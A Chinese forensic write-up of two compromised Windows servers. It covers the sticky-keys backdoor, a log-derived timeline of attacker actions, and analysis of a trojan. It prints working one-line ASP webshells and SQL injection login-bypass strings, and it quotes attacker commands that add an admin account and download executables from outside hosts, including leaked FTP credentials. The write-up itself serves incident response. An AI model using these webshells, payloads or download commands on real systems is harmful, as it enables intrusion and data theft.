随着信息技术的发展,越来越多的人都喜欢用计算机办公,发邮件,建设自己的个人站点,公司建立自己的企业站点,政府也逐渐的采取了网上办公,更好的为人民服务,银行和证券机构也都开始依托互联网来进行金融和股票交易,但是随着方便的同时也同时带来了新的一些计算机网络安全隐患,随着司法机关的介入,我相信在不久的将来,网络攻击调查取证也会成为立法机构必须要考虑设立的一门新的学科,目前来说开设这个的课程多在网络警察和一些特殊机关,现在我来给大家讲下我亲身经历并参与完成的一次取证过程,用事实来讲述;
我一直从事病毒分析,网络攻击响应相关的工作,这次应好朋友的邀请,帮忙配合去协查几台服务器,我们来到了某XXX驻地,首先进行例行检查。经过了 1天左右的时间的检查,其中用到了一些专用设备也包含自主编写的工具以及第三方提供的勘察取证软件,共发现问题主机服务器10台,其中2台比较严重,(以下用A服务器和B服务器来代替)和朋友商定后,决定带回我们的实验室,进行专项深入分析。
习惯的检查步骤操作:
服务器操作系统版本信息——>操作系统补丁安装情况——>操作系统安装时间,中间有没有经过进行重新安装——>服务器维护情况——>服务器上面安装的软件版本信息
日志检查——IDS日志信息/IIS日志信息/系统日志信息
网站代码审查——是否存在一句话木马,源代码上是否存在恶意代码插入
杀毒软件版本更新情况——是否是最新版本,配置的是否合理,配套的监视是否全部打开
数据恢复——>利用专用数据恢复软件进行数据恢复,恢复一些被删除的日志信息和系统信息,曾经安装过的文件操作信息。
提取可疑文件(病毒、木马、后门、恶意广告插件)——在系统文件目录利用第三方或者自开发软件,对可疑文件进行提取并进行深度分析。
上述步骤是我个人总结的,有不妥的地方还请朋友们指正,介绍完理论,我们来实践处理下这两台服务器。
A服务器检查处理过程
该A服务器所装的操作系统是Advanced 2000 server,服务器上安装的有瑞星2008杀毒软件,病毒库已经更新到最新版本。但是并没有安装网络防火墙和其他系统监视软件,安装的ftp服务器版本为server-u 6.0(存在溢出攻击的威胁)
一 对原始数据进行恢复
利用Datarecover软件来恢复一些被删除的文件,目的是希望从被删除的文件来找出一些木马或者后门以及病毒。进行深度分析,把曾经做过的格式化,以及在回收站中删除过的文件恢复过来,但是遗憾的是成功拿下这台服务器权限的黑客已经做了专业处理,把他的一些痕迹进行了全面清理,个人认为他使用了日本地下黑客组织开发的专项日志清除工具,经过我和助手的共同努力还是把系统日志恢复到当年5月份。
二 手工分析可疑文件
在本服务器的c盘根目录下面有一个sethc..exe 文件。这个文件是微软自带的,是系统粘制键,真实的大小应为27kb,而这个文件为270kb,起初我以为是由于打补丁的原因。但是经过翻阅一些资料和做比对之后,才知道这样的文件是一个新开发的流行后门,主要用法:通过3389终端,然后通过5次敲击shift键,直接调用sethc.exe而直接取得系统权限。随后达到控制整个服务器,通常他还是通过删除正常的一些c盘exe文件。然后把自己伪造成那个所删除的exe文件名。造成一种假象。
这里我们提供解决方法如下:个人建议这个功能实用性并不高,建议直接删除这个文件,如果有人利用这个手法来对你的服务器进行入侵,那就肯定是有人做了手脚,可以第一时间发现黑客入侵行为,也可以作为取证分析的一个思路;在控制面板的辅助功能里面设置取消粘制键。
三、 利用专用防火墙检查工具去查看网络连接情况
目的是通过抓数据包来找出问题。如果对方安装的有远程控制终端,他肯定需要让保存在服务器上的后门和控制终端进行通话,会有一个会话连接。通过防火墙的拦截功能而去寻找出控制的源头。这个上面没有发现存在反弹木马,所以没有看到入侵的源头。
四、检查系统日志
作用:检查系统日志是否被入侵者清除,如果日志被入侵者删除,需要用数据恢复软件恢复操作系统日志
检查内容:主要包括IIS日志,安全性日志,系统日志。
更近一步深入检查:
找到日志后,仔细分析网站是否有入侵者留下的webshell,尤其是一句话后门
根据Webshell的名字, 在IIS 访问日志里搜索相关的名字,找到入侵者常用的ip地址,分析ip地址
还可以根据此IP地址检索IIS日志中,此入侵者都进行过什么样的操作
技术点滴:如果你比较熟悉Webshell,通过Get操作可以知道入侵者都进行过何种操作。因为Get操作是被系统记录的。
如果入侵者装有系统级的后门,用常用工具比如冰刃(IceSword),System Repair Engineer (SREng)等分析出可疑文件,用其他调试工具分析找到入侵者控制端IP地址。
通过服务器日志查出隐藏在后面的幕后黑客
通过iis的log访问日志,排查出三个可疑目标,其中一个手法相对于后两个入侵者更熟练一些,他在今年5月份左右或者更早就拿到了该服务器权限,上来之后到是没有做任何的添加和修改,从技术上来看,他是通过寻找网站的注入点进来的,然后在上面放了不少的后门,还放了一个mm.exe的文件,但是因为技术问题,没有把这个马运行起来,从外部访问只是在主页上显示为mm.jpeg,伪装成了图片。但是打开以后,什么都没有。经过我们分析以后,它是一张裸女的jpeg文件。如果他这个mm.exe成功,完全有可能将该主站页面换成一张黄色图片。危害还是有的。另外该站点权限给的过高,在访问新闻频道的时候,直接就是sa权限。这个是最高系统级和Admin是一个级别的。
由于服务器被网管人员重新装过,初步怀疑是用的ghost安装的,造成了原珍贵日志数据无法找回,我们只能分析出7月份-12月份这段时间的日志,通过这些日志我们又发现了针对此站点的入侵记录。
入侵者操作再现:(黑客入侵操作过程分析)
2007-07-15 14:51:53 61.184.107.206 添加管理用户 net localgroup administrator Cao$ /add
2007-07-15 15:08:56 61.184.107.206 写下载exe的vbs脚本 c:/admin.vbs 试图下载exe地址为: http://www.dianqiji.com/pic/2007/0428/admin.exe
2007-08-12 09:48:45 218.205.238.6 写入webshell小马:d:/ybcenter/gg3.asp shell里留的QQ:183037,之后此人频繁用此后门登陆服务器
2007-08-25 08:03:15 218.28.24.118 曾访问他以前留下的操作数据库的webshell /system/unit/main.asp 此后门可以浏览到敏感数据库的信息
2007-08-25 08:12:45 218.28.24.118 写入另一个webshell D:/ybcenter/ggsm.asp
之后,218.28.24.118用以前留下的功能比较全的webshell /Cnnsc.asp和/system/unit/Cnnsc.asp频繁操作服务器上文件
2007-11-11 14:23:23 218.28.24.118 用他曾经留下的操作数据库的后门/service/asp.asp访问敏感数据库的信息
2007-08-25 08:27:57 218.28.24.118 用他曾经留下的操作数据库的后门/system/unit/sql.asp访问敏感数据库的信息
2007-11-11 11:02:55 218.28.24.118 试图访问他曾经留下的操作数据库的后门/yb/in_main3.asp访问敏感数据库
2007-08-06 12:42:41 218.19.22.152 写下载脚本C:/down.vbs 下载的exe为 http://ray8701.3322.org/1.exe
2007-08-09 11:57:16 218.19.98.147 写ftp下载exe的脚本c:/zxq.txt ftp服务器203.253.31.244 用户名kick1000 密码84460965 下载1.exe
2007-08-26 07:43:47 123.5.57.117 试图攻击服务器
2007-08-26 07:43:47 123.5.57.117 写ftp下载exe的脚本c:/zxq.txt ftp服务器203.253.31.244 用户名kick1000 密码84460965 下载1.exe
2007-12-10 12:41:34 123.52.18.141 检测注入
五、查看登陆信息 查看是否存在有克隆帐户。
方法:检查注册表里面的sam文件有没有相同的fv,在这里检查过程中没有发现存在有克隆帐号。
六、查看系统安装日志,在这里并未发现问题。
七、 查看IIS访问日志,在这里发现了攻击者信息。
2007-12-01 08:55:16 220.175.79.231 检测注入
2007-12-03 18:40:48 218.28.68.126 检测注入
2007-12-04 01:31:32 218.28.192.90 检测注入,扫描web目录
2007-12-04 23:23:33 221.5.55.76 检测注入
2007-12-05 09:20:57 222.182.140.71 检测注入
2007-12-08 09:39:53 218.28.220.154 检测注入
2007-12-08 21:31:44 123.5.197.40 检测注入
2007-12-09 05:32:14 218.28.246.10 检测注入
2007-12-09 08:47:43 218.28.192.90 检测注入
2007-12-09 16:50:39 61.178.89.229 检测注入
2007-12-10 05:50:24 58.54.98.40 检测注入
定位可疑IP地址,追踪来源 查出IP地址的信息。
八、查看网站首页的源代码,在iframe 这个位置查看是否有不属于该网站的网站信息。(查找 网马的方法),以及如何发现一些潜在的木马和网络可利用漏洞。
下面是我们得到的一些他的网马。

gg3.asp Q:183637
log.asp
pigpot.asp
webdown.vbs
attach/a.gif
attach/chongtian.gif
attach/111.rar
system/unit/yjh.asp

system/unit/conn.asp 加入防注入
Q:6242889678
 
images/mm.jpg = exe自解压 主页包含文件

一句话木马:<%execute request %>
备份一句话木马 <%eval(request("a"):response.end%>
注射检查,在IIS里面查找是否存在的有针对 %20 and 1=1’sql
'or'='or' a'or'1=1-- ,'or1=1-- ,"or1=1-- ,or1=1--, 'or'a'='a, "or"="a'='a等
作用:躲避验证信息 主要用在后台登陆上
%5c 爆数据库,作用直接下载服务器上的数据库,获得用户名和密码,经过系统提权而拿到整个服务器权限。
针对一些下载者这样的木马,主要需要在windows /document and setting下面的local setting 的 temp 或者 temp internet的这个文件夹中查看刚生成的exe文件,重点查看一下在system32文件夹下面的exe文件,尤其关注最新生成的exe文件,伪造的系统文件等。
以上就是针对A服务器的整个检查过程以及发现问题后该如何处理和补救的相关解决方法。
B服务器检查取证分析
B服务器装的是windows2000 server版本,操作步骤同上。
经过一段细心的检查还是让我和助手们发现了一个木马,起因是在网站源代码处发现都被插入了一些奇怪的代码,在system32系统文件夹下还发现了新的niu.exe,非常可疑,提取该exe文件,在虚拟机中进行分析,得出该exe工作原理:
该exe属木马类,病毒运行后判断当前运行文件的文件路径如果不是%System32%/SVCH0ST.EXE,将打开当前文件的所在目录复制自身到%System32%下,更名为SVSH0ST.EXE,并衍生autorun.inf文件;复制自身到所有驱动器根目录下,更名为niu.exe,并衍生autorun.inf文件,实现双击打开驱动器时,自动运行病毒文件;遍历所有驱动器,在htm、asp、aspx、php、html、jsp格式文件的尾部插入96个字节的病毒代码;遍历磁盘删除以GHO为扩展名的文件,使用户无法进行系统还原;连接网络下载病毒文件;修改系统时间为2000 年;病毒运行后删除自身。

安全专家:真实的网络攻击取证纪实相关推荐

  1. 安全专家:真实的网络***取证纪实

    诚信网安--子明 [51CTO.com 专家特稿]随着信息技术的发展,越来越多的人都喜欢用计算机办公,发邮件,建设自己的个 人站点,公司建立自己的企业站点,政府也逐渐的采取了网上办公,更好的为人民服务 ...

  2. BlackHat2017热点之数据取证与事件响应

    美国黑帽大会(Black Hat USA)创办于1997年,被公认为世界信息安全行业的最高盛会,也是最具技术性的信息安全会议.大会每年吸引全球来自100多个国家的超过1万5千名专业观众参与.250多家 ...

  3. 【转载】什么是数字取证(Digital forensics)?

    数字取证定义 数字取证(Digital forensics),有时也称作"计算机取证",是将科学调查技术应用于数字犯罪和攻击领域的一门学问.它是法律和商业在互联网时代的一个重要体现 ...

  4. 云原生安全专家观察:容器云安全现状和发展趋势

    容器云技术在弹性和效率上的巨大优势,使其日益成为主流的IT基础设施.根据Gartner的预测,到2025年,云原生平台将成为95%以上的新数字化计划的基础,而云原生平台中的很大比例指的是容器云平台.伴 ...

  5. 数字取证在打击和预防网络犯罪中的作用

    数字取证在调查网络犯罪.防止数据泄露.在法律案件中提供证据.保护知识产权和恢复丢失的数据方面发挥着关键作用. 详细了解数字取证的重要性.如何进行网络安全调查以及数字取证专家面临的挑战. 数字取证的 4 ...

  6. 信息安全要记忆的东西

    一(重点).1.网络信息安全基本属性(基本目标)CIA: 机密性:网络信息数据在传输过程中不允许泄露.被窃取. 完成性:网络信息数据在传输过程中不允许被篡改. 可用性:网络信息数据在授权的条件下,要及 ...

  7. 践行安全使命,助力冬奥安全,常态化演练——赛宁在行动

    北京2022冬奥在即,北京昌平公安组织了网络信息安全演练,赛宁网安.公安一所等单位通力合作,积极参与了此次演练.本次演练,技术支撑单位合作组建了多个攻击小组,协作展开真实的网络攻击,防守方涵盖党政机关 ...

  8. 信息安全-防火墙技术原理与应用

    一.防火墙概述 1.1 防火墙概念 为了应对网络威胁,联网的机构或公司将自己的网络与公共的不可信任的网络进行隔离 方法:根据网络的安全信任程度和需要保护的对象,人为划分若干安全区域,包括: 公共外部网 ...

  9. 【无人驾驶】“自主代客泊车”/自动泊车方案调研 2

    目录 智行者发布自主代客泊车(AVP)方案 中电昆辰"鹰眼"定位(射频定位.UWB) 百度自主泊车解决方案 纵目科技 驭势科技 纽劢科技 Momenta 魔视智能 吉利 魔视智能 ...

最新文章

  1. App is not indexable by Google Search; consider adding at least one Activity with an ACTION-VIEW int
  2. 【组队学习】【28期】数据采集从入门到精通
  3. 节约能源,做个合格的环保主义者,不要做网络灾民
  4. python3 字符串 和 列表(list)互相转换
  5. Python爬虫学到什么程度就可以去找工作了?
  6. Jedis对redis的操作详解
  7. java 中 image 和 byte[] 相互转换
  8. shell编程:对话 UNIX: 更多 shell 脚本技术
  9. 7-71 爬动的蠕虫 (15 分)
  10. 找回华为云删除的通讯录_找回小米手机误删照片只要10秒!人人都知道的方法,你怎能不知道...
  11. Exceptions, Catch, and Throw(Chapter 10 of Programming Ruby)
  12. python都被我用来爬美女图片了
  13. 对TMS320F28335存储空间的理解
  14. 计算机优秀毕业生访谈,访谈 | 信息院优秀毕业生经验分享
  15. Openstack+Opencontrail安装与部署初级教程
  16. 打印没反应/打印耗时长/not accessible
  17. Swiper去除点击选项卡时出现的蓝色边框和蓝色背景
  18. vue使用d3数据可视化(柱状图、饼图、折线图 带坐标轴)
  19. office365离线安装
  20. MODIS MOD13A3 ndvi数据sg批量滤波

热门文章

  1. vscode 配置 Rust 运行环境
  2. 【Spring Cloud】Sleuth+Zipkin全链路日志追踪接入实战
  3. html js utf8编码转换器,用Javascript实现UTF8编码转换成gb2312编码
  4. 人人都是产品经理02-06章摘要
  5. 《弓》:集金基德大成
  6. 获得三星(Samsung) Galaxy Note 10.1的root权限--(2)
  7. C++ 哈希表基本用法
  8. CentOS常用软件一键安装脚本
  9. 回味小时候拿着诺基亚玩的推箱子
  10. 014-数据结构-树形结构-基数树、Patricia树、默克尔树、梅克尔帕特里夏树( Merkle Patricia Tree, MPT)...